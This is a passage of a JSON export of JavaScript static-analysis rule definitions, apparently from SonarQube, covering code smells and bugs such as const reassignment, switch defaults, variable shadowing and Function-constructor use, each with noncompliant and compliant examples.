String honorific = p.isMarried()?\"Mrs. \":\"Miss \";\n return p.gender==Person.MALE?\"Mr. \": honorific + p.getLastName();\n<\/pre>","status":"READY","tags":["rank5"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:S3500","repo":"javascript","name":"Attempts should not be made to update \"const\" variables","htmlDesc":"<p>Variables declared with <code>const<\/code> cannot be modified. Unfortunately, attempts to do so don't always raise an error; in a non-ES2015\nenvironment, such an attempt might simply be ignored.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nconst pi = \"yes, please\";\npi = 3.14; \/\/ Noncompliant\n<\/pre>","status":"READY","tags":["rank1"],"langName":"JavaScript","params":[],"type":"BUG"},{"key":"javascript:S3509","repo":"javascript","name":"Default parameters should not cause side effects","htmlDesc":"<p>The assignment of default parameter values is generally intended to help the caller. But when a default assignment causes side effects, the caller\nmay not be aware of the extra changes or may not fully understand their implications. I.e. default assignments with side effects may end up hurting\nthe caller, and for that reason, they should be avoided.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nvar count = 0;\n\nfunction go(i = count++) { \/\/ Noncompliant\n console.log(i);\n}\n\ngo(); \/\/ outputs 0\ngo(7); \/\/ outputs 7\ngo(); \/\/ outputs 1\n<\/pre>","status":"READY","tags":["rank3"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:S3513","repo":"javascript","name":"\"arguments\" should not be accessed directly","htmlDesc":"<p>The magic of JavaScript is that you can pass arguments to functions that don't declare parameters, and on the other side, you can use those\npassed-in arguments inside the no-args <code>function<\/code>. <\/p>\n<p>But just because you can, that does't mean you should. The expectation and use of arguments inside functions that don't explicitly declare them is\nconfusing to callers. No one should ever have to read and fully understand a function to be able to use it competently. <\/p>\n<p>If you don't want to name arguments explicitly, use the <code>...<\/code> syntax to specify that an a variable number of arguments is expected. Then\ninside the function, you'll be dealing with a first-class array, rather than an array-like structure.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nfunction concatenate() {\n let args = Array.prototype.slice.call(arguments); \/\/ Noncompliant\n return args.join(', ');\n}\n\nfunction doSomething(isTrue) {\n var args = Array.prototype.slice.call(arguments, 1); \/\/ Noncompliant\n if (!isTrue) {\n for (var arg of args) {\n ...\n }\n }\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nfunction concatenate(...args) {\n return args.join(', ');\n}\n\nfunction doSomething(isTrue, ...values) {\n if (!isTrue) {\n for (var value of values) {\n ...\n }\n }\n}\n<\/pre>","status":"READY","tags":["rank1"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:S3514","repo":"javascript","name":"Destructuring syntax should be used for assignments","htmlDesc":"<p>ECMAScript 2015 introduced the ability to extract and assign multiple data points from an object or array simultaneously. This is called\n\"destructuring\", and it allows you to condense boilerplate code so you can concentrate on logic. <\/p>\n<p>This rule raises an issue when multiple pieces of data are extracted out of the same object or array and assigned to variables.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nfunction foo (obj1, obj2, array) {\n var a = obj1.a; \/\/ Noncompliant\n var b = obj1.b;\n\n var name = obj2.name; \/\/ ignored; there's only one extraction-and-assignment\n\n var zero = array[0]; \/\/ Noncompliant\n var one = array[1];\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nfunction foo (obj1, obj2, array) {\n var {a, b} = obj1;\n\n var {name} = obj2; \/\/ this syntax works because var name and property name are the same\n\n var [zero, one] = array;\n}\n<\/pre>","status":"READY","tags":["rank2"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:S3516","repo":"javascript","name":"Function returns should not be invariant","htmlDesc":"<p>When a function is designed to return an invariant value, it may be poor design, but it shouldn't adversely affect the outcome of your program.\nHowever, when it happens on all paths through the logic, it is likely a mistake.<\/p>\n<p>This rule raises an issue when a function contains several <code>return<\/code> statements that all return the same value.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nfunction foo(a) { \/\/ Noncompliant\n let b = 12;\n if (a) {\n return b;\n }\n return b;\n}\n<\/pre>","status":"READY","tags":["rank5"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:S3523","repo":"javascript","name":"Function constructors should not be used","htmlDesc":"<p>In addition to being obtuse from a syntax perspective, function constructors are also dangerous: their execution evaluates the constructor's string\narguments similar to the way <code>eval<\/code> works, which could expose your program to random, unintended code which can be both slow and a security\nrisk.<\/p>\n<p>In general it is better to avoid it altogether, particularly when used to parse JSON data. You should use ECMAScript 5's built-in JSON functions or\na dedicated library.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nvar obj = new Function(\"return \" + data)(); \/\/ Noncompliant\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nvar obj = JSON.parse(data);\n<\/pre>\n<h2>Exceptions<\/h2>\n<p>Function calls where the argument is a string literal (e.g. <code>(Function('return this'))()<\/code>) are ignored. <\/p>","status":"READY","tags":["rank3"],"langName":"JavaScript","params":[],"type":"VULNERABILITY"},{"key":"javascript:S3524","repo":"javascript","name":"Braces and parentheses should be used consistently with arrow functions","htmlDesc":"<p>Shared coding conventions allow teams to collaborate effectively. This rule raises an issue when the use of parentheses with an arrow function does\nnot conform to the configured requirements.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<p>With the configured defaults forbidding parentheses<\/p>\n<pre>\nvar foo = (a) => { \/* ... *\/ }; \/\/ Noncompliant; remove parens from arg\nvar bar = (a, b) => { return 0; }; \/\/ Noncompliant; remove curly braces from body\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nvar foo = a => { \/* ... *\/ };\nvar bar = (a, b) => 0;\n<\/pre>","status":"READY","tags":["rank2"],"langName":"JavaScript","params":[{"key":"body_braces","htmlDesc":"True to require curly braces around function body. False to forbid them for single-return bodies.","defaultValue":"false","type":"BOOLEAN"},{"key":"parameter_parens","htmlDesc":"True to require parentheses around parameters. False to forbid them for single parameter.","defaultValue":"false","type":"BOOLEAN"}],"type":"CODE_SMELL"},{"key":"javascript:S3525","repo":"javascript","name":"Class methods should be used instead of \"prototype\" assignments","htmlDesc":"<p>Originally JavaScript didn't support <code>class<\/code>es, and class-like behavior had to be kludged using things like <code>prototype<\/code>\nassignments for \"class\" functions. Fortunately, ECMAScript 2015 added classes, so any lingering <code>prototype<\/code> uses should be converted to\ntrue <code>class<\/code>es. The new syntax is more expressive and clearer, especially to those with experience in other languages.<\/p>\n<p>Specifically, with ES2015, you should simply declare a <code>class<\/code> and define its methods inside the class declaration.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nfunction MyNonClass(initializerArgs = []) {\n this._values = [...initializerArgs];\n}\n\nMyNonClass.prototype.doSomething = function () { \/\/ Noncompliant\n \/\/ ...\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nclass MyClass {\n constructor(initializerArgs = []) {\n this._values = [...initializerArgs];\n }\n\n doSomething() {\n \/\/...\n }\n}\n<\/pre>","status":"READY","tags":["rank2"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:S3533","repo":"javascript","name":"\"import\" should be used to include external code","htmlDesc":"<p>Before ECMAScript 2015, module management had to be ad-hoc or provided by 3rd-party libraries such as Node.js, Webpack, or RequireJS. Fortunately,\nES2015, provides language-standard mechanisms for module management, <code>import<\/code> and <code>export<\/code>, and older usages should be\nconverted.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\n\/\/ circle.js\nexports.area = function (r) {\n return PI * r * r;\n};\n\n\/\/ foo.js\ndefine([\".\/cart\", \".\/horse\"], function(cart, horse) { \/\/ Noncompliant\n \/\/ ...\n});\n\n\/\/ bar.js\nconst circle = require('.\/circle.js'); \/\/ Noncompliant\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\n\/\/ circle.js\nlet area = function (r) {\n return PI * r * r;\n}\nexport default area;\n\n\/\/ foo.js\nimport cart from \".\/cart.js\";\nimport horse from \".\/horse.js\";\n\n\/\/ bar.js\nimport circle from \".\/circle.js\"\n<\/pre>","status":"READY","tags":["rank1"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:S3579","repo":"javascript","name":"Array indexes should be numeric","htmlDesc":"<p>JavaScript is flexible enough to allow you to store values in an array with either numeric or named indexes. That is, it supports associative\narrays. But creating and populating an object in JavaScript is just as easy as an array, and more reliable if you need named members.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nlet arr = [];\narr[0] = 'a';\narr['name'] = 'bob'; \/\/ Noncompliant\narr[1] = 'foo';\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nlet obj = {\n name: 'bob',\n arr: ['a', 'foo']\n};\n<\/pre>","status":"READY","tags":["rank2"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:S3616","repo":"javascript","name":"Comma and logical OR operators should not be used in switch cases","htmlDesc":"<p>The comma operator (<code>,<\/code>) evaluates its operands, from left to right, and returns the second one. That's useful in some situations, but\njust wrong in a <code>switch<\/code> <code>case<\/code>. You may think you're compactly handling multiple values in the case, but only the last one in\nthe comma-list will ever be handled. The rest will fall through to the default.<\/p>\n<p>Similarly the logical OR operator (<code>||<\/code>) will not work in a <code>switch<\/code> <code>case<\/code>, only the first argument will be\nconsidered at execution time.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nswitch a {\n case 1,2: \/\/ Noncompliant; only 2 is ever handled by this case\n doTheThing(a);\n case 3 || 4: \/\/ Noncompliant; only '3' is handled\n doThatThing(a);\n case 5:\n doTheOtherThing(a);\n default:\n console.log(\"Neener, neener!\"); \/\/ this happens when a==1 or a == 4\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nswitch a {\n case 1:\n case 2:\n doTheThing(a);\n case 3:\n case 4:\n doThatThing(a);\n case 5:\n doTheOtherThing(a);\n default:\n console.log(\"Neener, neener!\");\n}\n<\/pre>","status":"READY","tags":["rank1"],"langName":"JavaScript","params":[],"type":"BUG"},{"key":"javascript:S3686","repo":"javascript","name":"Functions should not be called both with and without \"new\"","htmlDesc":"<p>Constructor functions, which create new object instances, must only be called with <code>new<\/code>. Non-constructor functions must not. Mixing\nthese two usages could lead to unexpected results at runtime.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nfunction getNum() {\n return 5;\n}\n\nfunction Num(numeric, alphabetic) {\n this.numeric = numeric;\n this.alphabetic = alphabetic;\n}\n\nvar myFirstNum = getNum();\nvar my2ndNum = new getNum(); \/\/ Noncompliant. An empty object is returned, NOT 5\n\nvar myNumObj1 = new Num();\nvar myNumObj2 = Num(); \/\/ Noncompliant. undefined is returned, NOT an object\n<\/pre>","status":"READY","tags":["rank3"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:S3699","repo":"javascript","name":"The output of functions that don't return anything should not be used","htmlDesc":"<p>If a function does not return anything, it makes no sense to use its output. Specifically, passing it to another function, or assigning its\n\"result\" to a variable is probably a bug because such functions return <code>undefined<\/code>, which is probably not what was intended.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nfunction foo() {\n}\n\na = foo();\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nfunction foo() {\n}\n\nfoo();\n<\/pre>","status":"READY","tags":["rank3"],"langName":"JavaScript","params":[],"type":"BUG"},{"key":"javascript:S3735","repo":"javascript","name":"\"void\" should not be used","htmlDesc":"<p>The <code>void<\/code> operator evaluates its argument and unconditionally returns <code>undefined<\/code>. It can be useful in pre-ECMAScript 5\nenvironments, where <code>undefined<\/code> could be reassigned, but generally, its use makes code harder to understand.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nvoid (function() {\n ...\n}());\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\n(function() {\n ...\n}());\n<\/pre>\n<h2>Exceptions<\/h2>\n<p>No issue is raised when <code>void 0<\/code> is used in place of <code>undefined<\/code>. <\/p>\n<pre>\nif (parameter === void 0) {...}\n<\/pre>","status":"READY","tags":["rank1"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:S3758","repo":"javascript","name":"Values not convertible to numbers should not be used in numeric comparisons","htmlDesc":"<p>In a Zen-like manner, <code>NaN<\/code> isn't equal to anything, even itself. So comparisons (<code>>, <, >=, <=<\/code>) where one\noperand is <code>NaN<\/code> or evaluates to <code>NaN<\/code> always return <code>false<\/code>. Specifically, <code>undefined<\/code> and objects that\ncannot be converted to numbers evaluate to <code>NaN<\/code> when used in numerical comparisons.<\/p>\n<p>This rule raises an issue when there is at least one path through the code where one of the operands to a comparison is <code>NaN<\/code>,\n<code>undefined<\/code> or an <code>Object<\/code> which cannot be converted to a number.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nvar x; \/\/ x is currently \"undefined\"\nif (someCondition()) {\n x = 42;\n}\n\nif (42 > x) { \/\/ Noncompliant; \"x\" might still be \"undefined\"\n doSomething();\n}\n\nvar obj = {prop: 42};\nif (obj > 24) { \/\/ Noncompliant\n doSomething();\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nvar x;\nif (someCondition()) {\n x = 42;\n} else {\n x = foo();\n}\n\nif (42 > x) {\n doSomething();\n}\n\nvar obj = {prop: 42};\nif (obj.prop > 24) {\n doSomething();\n}\n<\/pre>","status":"READY","tags":["rank2"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:S3776","repo":"javascript","name":"Cognitive Complexity of functions should not be too high","htmlDesc":"<p>Cognitive Complexity is a measure of how hard the control flow of a function is to understand. Functions with high Cognitive Complexity will be\ndifficult to maintain.<\/p>\n<h2>See<\/h2>\n<ul>\n <li> <a href=\"http:\/\/redirect.sonarsource.com\/doc\/cognitive-complexity.html\">Cognitive Complexity<\/a> <\/li>\n<\/ul>","status":"READY","tags":["rank5"],"langName":"JavaScript","params":[{"key":"threshold","htmlDesc":"The maximum authorized complexity.","defaultValue":"15","type":"INTEGER"}],"type":"CODE_SMELL"},{"key":"javascript:S3782","repo":"javascript","name":"Arguments to built-in functions should match documented types","htmlDesc":"<p>The types of the arguments to built-in functions are specified in the JavaScript language specifications. Calls to these functions should conform\nto the documented types, otherwise the result will most likely not be what was expected (e.g.: the call would always return <code>false<\/code>).<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nconst isTooSmall = Math.abs(x < 0.0042);\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nconst isTooSmall = Math.abs(x) < 0.0042;\n<\/pre>","status":"READY","tags":["rank1"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:S3785","repo":"javascript","name":"\"in\" should not be used with primitive types","htmlDesc":"<p>The <code>in<\/code> operator tests whether the specified property is in the specified object.<\/p>\n<p>If the right operand is a of primitive type (i.e., not an object) the <code>in<\/code> operator raises a <code>TypeError<\/code>.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nvar x = \"Foo\";\n\"length\" in x; \/\/ Noncompliant: TypeError\n0 in x; \/\/ Noncompliant: TypeError\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nvar x = new String(\"Foo\");\n\"length\" in x; \/\/ true\n0 in x; \/\/ true\n\"foobar\" in x; \/\/ false\n<\/pre>","status":"READY","tags":["rank4"],"langName":"JavaScript","params":[],"type":"BUG"},{"key":"javascript:S3786","repo":"javascript","name":"Template literal placeholder syntax should not be used in regular strings","htmlDesc":"<p>JavaScript allows developers to embed variables or expressions in strings using template literals, instead of string concatenation. This is done by\nusing expressions like <code>${variable} <\/code> in a string between two back-ticks (<code>`<\/code>).<\/p>\n<p>When used in a regular string literal (between double or single quotes) the template will not be evaluated and will be used as a literal, which is\nprobably not what was intended.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nconsole.log(\"Today is ${date}\"); \/\/ Noncompliant\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nconsole.log(`Today is ${date}`);\n<\/pre>","status":"READY","tags":["rank2"],"langName":"JavaScript","params":[],"type":"BUG"},{"key":"javascript:S3796","repo":"javascript","name":"Callbacks of array methods should have return statements","htmlDesc":"<p>Arrays in JavaScript have several methods for filtering, mapping or folding that require a callback. Not having a return statement in such a\ncallback function is most likely a mistake.<\/p>\n<p>This rule applies for the following methods of an array:<\/p>\n<ul>\n <li> <code>Array.from<\/code> <\/li>\n <li> <code>Array.prototype.every<\/code> <\/li>\n <li> <code>Array.prototype.filter<\/code> <\/li>\n <li> <code>Array.prototype.find<\/code> <\/li>\n <li> <code>Array.prototype.findIndex<\/code> <\/li>\n <li> <code>Array.prototype.map<\/code> <\/li>\n <li> <code>Array.prototype.reduce<\/code> <\/li>\n <li> <code>Array.prototype.reduceRight<\/code> <\/li>\n <li> <code>Array.prototype.some<\/code> <\/li>\n <li> <code>Array.prototype.sort<\/code> <\/li>\n<\/ul>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nvar merged = arr.reduce(function(a, b) {\n a.concat(b);\n}); \/\/ Noncompliant: No return statement\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nvar merged = arr.reduce(function(a, b) {\n return a.concat(b);\n});\n<\/pre>","status":"READY","tags":["rank2"],"langName":"JavaScript","params":[],"type":"BUG"},{"key":"javascript:S3799","repo":"javascript","name":"Destructuring patterns should not be empty","htmlDesc":"<p>Destructuring is a convenient way of extracting multiple values from data stored in (possibly nested) objects and arrays. However, it is possible\nto create an empty pattern that has no effect. When empty curly braces or brackets are used to the right of a property name most of the time the\nintent was to use a default value instead.<\/p>\n<p>This rule raises an issue when empty destructuring pattern is used.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nvar {a: {}, b} = myObj; \/\/ Noncompliant\nfunction foo({first: [], second}) { \/\/ Noncompliant\n \/\/ ...\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nvar {a = {}, b} = myObj;\nfunction foo({first = [], second}) {\n \/\/ ...\n}\n<\/pre>","status":"READY","tags":["rank2"],"langName":"JavaScript","params":[],"type":"BUG"},{"key":"javascript:S3828","repo":"javascript","name":"\"yield\" expressions should not be used outside generators","htmlDesc":"<p>The <code>yield<\/code> keyword is used in a generator function to return an <code>IteratorResult<\/code> to the caller. It has no other purpose, and\nif found outside such a function will raise a <code>ReferenceError<\/code> because it is then treated as an identifier.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nfunction foo() {\n for (var i = 0; i < 5; i++) {\n yield i * 2;\n }\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nfunction * foo() {\n for (var i = 0; i < 5; i++) {\n yield i * 2;\n }\n}\n<\/pre>","status":"READY","tags":["rank1"],"langName":"JavaScript","params":[],"type":"BUG"},{"key":"javascript:S3834","repo":"javascript","name":"\"Symbol\" should not be used as a constructor","htmlDesc":"<p><code>Symbol<\/code> is a primitive type introduced in ECMAScript2015. Its instances are mainly used as unique property keys.<\/p>\n<p>An instance can only be created by using <code>Symbol<\/code> as a function. Using <code>Symbol<\/code> with the <code>new<\/code> operator will raise\na <code>TypeError<\/code>.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nconst sym = new Symbol(\"foo\"); \/\/ Noncompliant\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nconst sym = Symbol(\"foo\");\n<\/pre>","status":"READY","tags":["rank1"],"langName":"JavaScript","params":[],"type":"BUG"},{"key":"javascript:S3854","repo":"javascript","name":"super() should be invoked appropriately","htmlDesc":"<p>There are situations where <code>super()<\/code> must be invoked and situations where <code>super()<\/code> cannot be invoked.<\/p>\n<p>The basic rule is: a constructor in a non-derived class cannot invoke <code>super()<\/code>; a constructor in a derived class must invoke\n<code>super()<\/code>.<\/p>\n<p>Furthermore:<\/p>\n<p>- <code>super()<\/code> must be invoked before the <code>this<\/code> and <code>super<\/code> keywords can be used.<\/p>\n<p>- <code>super()<\/code> must be invoked with the same number of arguments as the base class' constructor.<\/p>\n<p>- <code>super()<\/code> can only be invoked in a constructor - not in any other method.<\/p>\n<p>- <code>super()<\/code> cannot be invoked multiple times in the same constructor.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nclass Animal {\n constructor() {\n super(); \/\/ Noncompliant, super() cannot be invoked in a base class\n }\n\n doSomething() {\n }\n}\n\nclass Dog extends Animal {\n constructor(name) {\n this.name = name;\n super.doSomething();\n super(); \/\/ Noncompliant, super() must be invoked before \"this\" or \"super\" is used\n }\n\n doSomething() {\n super(); \/\/ Noncompliant, super() cannot be invoked outside of a constructor\n }\n}\n\nclass Labrador extends Dog {\n constructor(name) {\n super(); \/\/ Noncompliant, super() must be invoked with one argument\n }\n}\n\nclass GermanShepherd extends Dog {\n constructor(name) {\n } \/\/ Noncompliant, super() must be invoked in constructor of derived class\n}\n\nclass FilaBrasileiro extends Dog {\n constructor(name) {\n super(name);\n super(name); \/\/ Noncompliant, super() can only be invoked once\n }\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nclass Animal {\n constructor() {\n }\n\n doSomething() {\n }\n}\n\nclass Dog extends Animal {\n constructor(name) {\n super();\n this.name = name;\n super.doSomething();\n }\n\n doSomething() {\n }\n}\n\nclass Labrador extends Dog {\n constructor(name) {\n super(name);\n }\n}\n\nclass GermanShepherd extends Dog {\n constructor(name) {\n super(name);\n }\n}\n\nclass FilaBrasileiro extends Dog {\n constructor(name) {\n super(name);\n }\n}\n<\/pre>\n<h2>Known Limitations<\/h2>\n<ul>\n <li>False negatives: some issues are not raised if the base class is not defined in the same file as the current class.<\/li>\n<\/ul>","status":"READY","tags":["rank1"],"langName":"JavaScript","params":[],"type":"BUG"},{"key":"javascript:S3923","repo":"javascript","name":"All branches in a conditional structure should not have exactly the same implementation","htmlDesc":"<p>Having all branches in a <code>switch<\/code> or <code>if<\/code> chain with the same implementation is an error. Either a copy-paste error was made\nand something different should be executed, or there shouldn't be a <code>switch<\/code>\/<code>if<\/code> chain at all. Note that this rule does not\napply to <code>if<\/code> chains without <code>else<\/code>s, or to <code>switch<\/code>es without <code>default<\/code> clauses.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nif (b == 0) { \/\/ Noncompliant\n doOneMoreThing();\n}\nelse {\n doOneMoreThing();\n}\n\nlet a = (b == 0) ? getValue() : getValue(); \/\/ Noncompliant\n\nswitch (i) { \/\/ Noncompliant\n case 1:\n doSomething();\n break;\n case 2:\n doSomething();\n break;\n case 3:\n doSomething();\n break;\n default:\n doSomething();\n}\n<\/pre>","status":"READY","tags":["rank1"],"langName":"JavaScript","params":[],"type":"BUG"},{"key":"javascript:S888","repo":"javascript","name":"Equality operators should not be used in \"for\" loop termination conditions","htmlDesc":"<p>Testing <code>for<\/code> loop termination using an equality operator (<code>==<\/code> and <code>!=<\/code>) is dangerous, because it could set up an\ninfinite loop. Using a broader relational operator instead casts a wider net, and makes it harder (but not impossible) to accidentally write an\ninfinite loop.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nfor (var i = 1; i != 10; i += 2) \/\/ Noncompliant. Infinite; i goes from 9 straight to 11.\n{\n \/\/...\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nfor (var i = 1; i <= 10; i += 2) \/\/ Compliant\n{\n \/\/...\n}\n<\/pre>\n<h2>Exceptions<\/h2>\n<p>Equality operators are ignored if the loop counter is not modified within the body of the loop and either:<\/p>\n<ul>\n <li> starts below the ending value and is incremented by 1 on each iteration. <\/li>\n <li> starts above the ending value and is decremented by 1 on each iteration. <\/li>\n<\/ul>\n<p>Equality operators are also ignored when the test is against <code>null<\/code>.<\/p>\n<pre>\nfor (var i = 0; arr[i] != null; i++) {\n \/\/ ...\n}\n\nfor (var i = 0; (item = arr[i]) != null; i++) {\n \/\/ ...\n}\n<\/pre>\n<h2>See<\/h2>\n<ul>\n <li> MISRA C++:2008, 6-5-2 <\/li>\n <li> <a href=\"http:\/\/cwe.mitre.org\/data\/definitions\/835\">MITRE, CWE-835<\/a> - Loop with Unreachable Exit Condition ('Infinite Loop') <\/li>\n <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/EwDJAQ\">CERT, MSC21-C.<\/a> - Use robust loop termination conditions <\/li>\n <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/GwDJAQ\">CERT, MSC21-CPP.<\/a> - Use inequality to terminate a loop whose counter changes\n by more than one <\/li>\n<\/ul>","status":"READY","tags":["rank4"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:StrictMode","repo":"javascript","name":"\"strict\" mode should be used with caution","htmlDesc":"<p>Even thought it may be a good practice to enforce JavaScript strict mode, doing so could result in unexpected behaviors on browsers that do not\nsupport it yet. Using this feature should therefore be done with caution and with full knowledge of the potential consequences on browsers that do not\nsupport it.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nfunction strict() {\n 'use strict';\n}\n<\/pre>","status":"READY","tags":["rank4"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:SwitchWithoutDefault","repo":"javascript","name":"\"switch\" statements should end with \"default\" clauses","htmlDesc":"<p>The requirement for a final <code>default<\/code> clause is defensive programming. The clause should either take appropriate action, or contain a\nsuitable comment as to why no action is taken.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nswitch (param) { \/\/missing default clause\n case 0:\n doSomething();\n break;\n case 1:\n doSomethingElse();\n break;\n}\n\nswitch (param) {\n default: \/\/ default clause should be the last one\n error();\n break;\n case 0:\n doSomething();\n break;\n case 1:\n doSomethingElse();\n break;\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nswitch (param) {\n case 0:\n doSomething();\n break;\n case 1:\n doSomethingElse();\n break;\n default:\n error();\n break;\n}\n<\/pre>\n<h2>See<\/h2>\n<ul>\n <li> MISRA C:2004, 15.0 - The MISRA C <em>switch<\/em> syntax shall be used. <\/li>\n <li> MISRA C:2004, 15.3 - The final clause of a switch statement shall be the default clause <\/li>\n <li> MISRA C++:2008, 6-4-3 - A switch statement shall be a well-formed switch statement. <\/li>\n <li> MISRA C++:2008, 6-4-6 - The final clause of a switch statement shall be the default-clause <\/li>\n <li> MISRA C:2012, 16.1 - All switch statements shall be well-formed <\/li>\n <li> MISRA C:2012, 16.4 - Every <em>switch<\/em> statement shall have a <em>default<\/em> label <\/li>\n <li> MISRA C:2012, 16.5 - A <em>default<\/em> label shall appear as either the first or the last <em>switch label<\/em> of a <em>switch<\/em> statement\n <\/li>\n <li> <a href=\"http:\/\/cwe.mitre.org\/data\/definitions\/478.html\">MITRE, CWE-478<\/a> - Missing Default Case in Switch Statement <\/li>\n <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/YgE\">CERT, MSC01-C.<\/a> - Strive for logical completeness <\/li>\n <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/JoIyAQ\">CERT, MSC01-CPP.<\/a> - Strive for logical completeness <\/li>\n<\/ul>","status":"READY","tags":["rank4"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:UnusedVariable","repo":"javascript","name":"Unused local variables and functions should be removed","htmlDesc":"<p>If a local variable or a local function is declared but not used, it is dead code and should be removed. Doing so will improve maintainability\nbecause developers will not wonder what the variable or function is used for.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nfunction numberOfMinutes(hours) {\n var seconds = 0; \/\/ seconds is never used\n return hours * 60;\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nfunction numberOfMinutes(hours) {\n return hours * 60;\n}\n<\/pre>","status":"READY","tags":["rank1"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:VariableShadowing","repo":"javascript","name":"Variables should not be shadowed","htmlDesc":"<p>Overriding a variable declared in an outer scope can strongly impact the readability, and therefore the maintainability, of a piece of code.\nFurther, it could lead maintainers to introduce bugs because they think they're using one variable but are really using another.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nshow: function(point, element) {\n if (!this.drops.length) return;\n var drop, affected = [];\n this.drops.each( function(drop) { \/\/ Non-Compliant; defines a new 'drop' parameter\n if(Droppables.isAffected(point, element, drop))\n affected.push(drop);\n });\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nshow: function(point, element) {\n if (!this.drops.length) return;\n var drop, affected = [];\n this.drops.each( function(aDrop) {\n if(Droppables.isAffected(point, element, aDrop))\n affected.push(aDrop);\n });\n<\/pre>\n<h2>See<\/h2>\n<ul>\n <li> MISRA C:2004, 5.2 - Identifiers in an inner scope shall not use the same name as an identifier in an outer scope, and therefore hide that\n identifier <\/li>\n <li> MISRA C++:2008, 2-10-2 - Identifiers declared in an inner scope shall not hide an identifier declared in an outer scope <\/li>\n <li> MISRA C:2012, 5.3 - An identifier declared in an inner scope shall not hide an identifier declared in an outer scope <\/li>\n <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/VwE\">CERT, DCL01-C.<\/a> - Do not reuse variable names in subscopes <\/li>\n <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/cwAhAQ\">CERT, DCL01-CPP.<\/a> - Do not reuse variable names in subscopes <\/li>\n<\/ul>","status":"READY","tags":["rank1"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:WithStatement","repo":"javascript","name":"\"with\" statements should not be used","htmlDesc":"<p>The use of the <code>with<\/code> keyword produces an error in JavaScript strict mode code. However, that's not the worst that can be said against\n<code>with<\/code>.<\/p>\n<p>Using <code>with<\/code> allows a short-hand access to an object's properties - assuming they're already set. 